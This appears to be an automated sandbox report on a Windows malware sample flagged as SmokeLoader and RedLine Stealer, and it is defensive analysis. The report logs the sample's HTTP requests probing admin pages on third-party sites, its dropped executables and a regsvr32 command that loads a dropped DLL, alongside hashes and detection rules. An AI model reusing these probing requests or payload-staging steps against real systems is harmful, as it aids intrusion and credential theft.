                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC182OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC576INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BjkoOWZ0aBem6AH8WAvzXc0h0iQESsyVcAZb4EUccLIMLZ8JpcnIj3yJnBkU5bOcsc9jo0diWOiBMvwxCWdyez%2FiJ2zMW17Bx7JXW24%2BS130hrnklGaCarHdJbE1S%2B927QigFvX1iYI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd71ead2678b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC168INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                254192.168.2.6496893.161.150.69443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC2006INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=7ca24f3e5c1e003d&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgfwAYFouQ6BkipNeG7KLRLX-Kzp6iEpSvg81iKjTx_Jv
                                                                                                                                                                                                                                                                                                                                                                content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=7ca24f3e5c1e003d&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgfwAYFouQ6BkipNeG7KLRLX-Kzp6iEpSvg81iKjTx_Jv; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-vONTvDDlfmHoPD9' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=86400; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 57674a900f587a3a1f1571205e001c6c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: vwkqfs6A3ra1GuWD7jumUwQvjZKkyh_pHCMBRKhB-rAiIRhUbZ_2wQ==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC14378INData Raw: 35 35 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC7574INData Raw: 4d 61 72 74 69 6e 22 7d 2c 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 6d 67 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 32 36 31 22 2c 22 6e 61 6d 65 22 3a 22 4d 61 64 61 67 61 73 63 61 72 22 7d 2c 7b 22 70 72 65 66 69 78 22 3a 22 2b 36 39 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 6d 68 22 2c 22 6e 61 6d 65 22 3a 22 4d 61 72 73 68 61 6c 6c 20 49 73 6c 61 6e 64 73 22 7d 2c 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 6d 6b 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 33 38 39 22 2c 22 6e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 4d 61 63 65 64 6f 6e 69 61 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 4d 61 6c 69 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 6d 6c 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 32 32 33 22 7d 2c 7b 22 70 72 65 66 69 78 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Martin"},{"country_code":"mg","prefix":"+261","name":"Madagascar"},{"prefix":"+692","country_code":"mh","name":"Marshall Islands"},{"country_code":"mk","prefix":"+389","name":"North Macedonia"},{"name":"Mali","country_code":"ml","prefix":"+223"},{"prefix"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                255192.168.2.649375202.81.112.32443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC184OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: testconnect.garena.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC124INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                256192.168.2.6497473.134.125.1754434328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC249OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://3fba-180-252-166-236.ngrok.io/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC249INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Error-Code: ERR_NGROK_3200
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 6f775cd5dd0c092eb62fa3f5c7333771
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC937INData Raw: 39 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 2d 66 75 6c 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 65 75 63 6c 69 64 2d 73 71 75 61 72 65 2f 45 75 63 6c 69 64 53 71 75 61 72 65 2d 52 65 67 75 6c 61 72 2d 57 65 62 53 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1498INData Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 49 74 61 6c 69 63 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f


                                                                                                                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                                                                                Start time:12:11:51
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\S23UhdW5DH.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\S23UhdW5DH.exe
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:306'176 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:9DF4007D210772FC229EEFEA7F15C06D
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                                                                                                Start time:12:11:57
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff609140000
                                                                                                                                                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:18
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\rghwvve
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\rghwvve
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:306'176 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:9DF4007D210772FC229EEFEA7F15C06D
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2410927648.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 45%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:20
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\FE8B.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\FE8B.exe
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x110000
                                                                                                                                                                                                                                                                                                                                                                File size:5'911'640 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:E88E0FE2BB602D639E5658C42F34AF2F
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 50%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:22
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:1'998'848 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2377117424.00000000023CC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:22
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:1'998'848 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:23
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\93B.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\93B.exe
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:431'104 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:1996A23C7C764A77CCACF5808FEC23B0
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 87%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:25
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                Commandline:regsvr32 /s C:\Users\user\AppData\Local\Temp\1199.dll
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff734620000
                                                                                                                                                                                                                                                                                                                                                                File size:25'088 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:25
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline: /s C:\Users\user\AppData\Local\Temp\1199.dll
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x210000
                                                                                                                                                                                                                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
